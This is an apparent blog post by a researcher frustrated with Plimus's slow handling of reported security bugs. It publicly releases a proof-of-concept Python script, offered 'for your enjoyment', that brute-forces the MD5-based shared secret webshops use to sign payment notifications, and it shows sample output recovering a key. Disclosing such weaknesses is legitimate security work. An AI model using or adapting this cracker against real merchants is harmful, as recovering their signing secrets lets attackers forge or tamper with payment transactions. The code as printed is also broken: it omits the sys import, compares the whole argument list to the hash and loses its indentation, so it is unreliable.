Howto crack Plimus "MD5hex encryption"
It's been a while since I have reported a few security bugs to Plimus. It took a few blogposts
explaining the issues publicly before I got in contact with an engineer. I understand that making
backwards incompatible changes to your customer facing API's is not a trivial task, however the
way Plimus handles these issues is just terrible.
One engineer asks me for more feedback while in the same mail thread another Plimus employee
demands proof I'm PCI certified and wants to know what applications I'm going to build before I
get access to the test API of Plimus. If you don't even let me test security bugs before I report
them you won't get the bugreport at all. Maybe I can test them after you have gone live and
customers already depend on the API.
The first actual promised date for a simple fix passed five days ago. Since then I have gotten no
response. They even refused to acknowledge in advance what exactly they where going to fix.
For your enjoyment I have written proof of concept code that you can use to crack the shared
secret between Plimus and a webshop. This secret is the only security with which transactions
between a webshop and Plimus are signed and authenticated. Have fun!
Once you have the reply a webshop gives to a Plimus IPN (in this example
"8c083afc16dfe31e5d92a6358f33297d"), you can recover the key like this:
$ python crack_plimus_hmac.py 8c083afc16dfe31e5d92a6358f33297d
Trying length 1
Trying length 2
Trying length 3
Trying length 4
Data Protection Key: SCRT
And the sourcecode:
CHARSET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
MAXLENGTH = 4
from md5 import md5
from itertools import product
target = sys.argv
for length in range(1, MAXLENGTH+1):
print "Trying length", length
for password in product(CHARSET, repeat=length):
if target == md5("OK"+"".join(password)).hexdigest():
print "Data Protection Key:", "".join(password)